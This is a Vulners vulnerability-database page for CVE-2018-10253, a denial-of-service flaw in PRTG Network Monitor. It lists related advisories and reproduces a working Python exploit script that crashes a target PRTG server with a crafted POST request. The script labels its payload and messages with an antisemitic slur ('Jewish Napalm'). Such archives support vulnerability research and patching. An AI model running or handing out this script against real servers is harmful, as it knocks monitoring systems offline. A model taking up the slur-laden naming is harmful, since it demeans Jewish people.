Vulners
Lucene search
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | PRTG Network Monitor < 18.1.39.1648 - Stack Overflow Denial of Service Exploit | 23 Apr 201800:00 | – | zdt |
 | Paessler PRTG Network Monitor Denial of Service Vulnerability | 24 Apr 201800:00 | – | cnvd |
 | CVE-2018-10253 | 21 Apr 201802:00 | – | cve |
 | CVE-2018-10253 | 21 Apr 201802:00 | – | cvelist |
 | PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service) | 23 Apr 201800:00 | – | exploitpack |
 | CVE-2018-10253 | 21 Apr 201802:29 | – | nvd |
 | PRTG Network Monitor < 18.1.39.1648 Stack Overflow Vulnerability | 24 Apr 201800:00 | – | openvas |
 | PRTG 18.1.39.1648 Stack Overflow | 23 Apr 201800:00 | – | packetstorm |
 | Code injection | 21 Apr 201802:29 | – | prion |
# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
#!/usr/bin/python
import requests
import sys
import os
import re
import socket
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
██╗███████╗██╗ ██╗██╗███████╗██╗ ██╗ ███╗ ██╗ █████╗ ██████╗ █████╗ ██╗ ███╗ ███╗
██║██╔════╝██║ ██║██║██╔════╝██║ ██║ ████╗ ██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║
██║█████╗ ██║ █╗ ██║██║███████╗███████║ ██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║
██ ██║██╔══╝ ██║███╗██║██║╚════██║██╔══██║ ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║
╚█████╔╝███████╗╚███╔███╔╝██║███████║██║ ██║ ██║ ╚████║██║ ██║██║ ██║ ██║███████╗██║ ╚═╝ ██║
╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
"""
banner2 = """
Author: @Lucas "luriel" Carmo
"""
os.system('clear')
print(green+banner)
print(yellow+banner2)
print(normal)
def check_http(url):
pattern = re.compile("http://")
return re.search(pattern, url)
def sanitize_url(url):
if(not check_http(url)):
return "http://" + url
return url
def check_server(url):
r = requests.get(url, timeout=4)
code = r.status_code
def send_jewish_payload(url):
payload = {'file':'addmap.htm'}
r = requests.post(url, params=payload)
def main():
try:
if len(sys.argv) <= 3 and len (sys.argv) >= 2:
try:
url = sanitize_url(sys.argv[1])
print(' [#] LOADING!')
if (check_server(url) != 404):
send_jewish_payload(url)
else:
print(' [!] Server shutdown or not found')
except requests.exceptions.ConnectionError:
print(' [~] BOOOOOM! PRTG Server has been exploded!')
except requests.exceptions.InvalidURL:
print(' [!] Invalid URL')
except requests.exceptions.Timeout:
print(' [!] Connection Timeout\n')
else:
print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
except KeyboardInterrupt:
print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2018 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.10232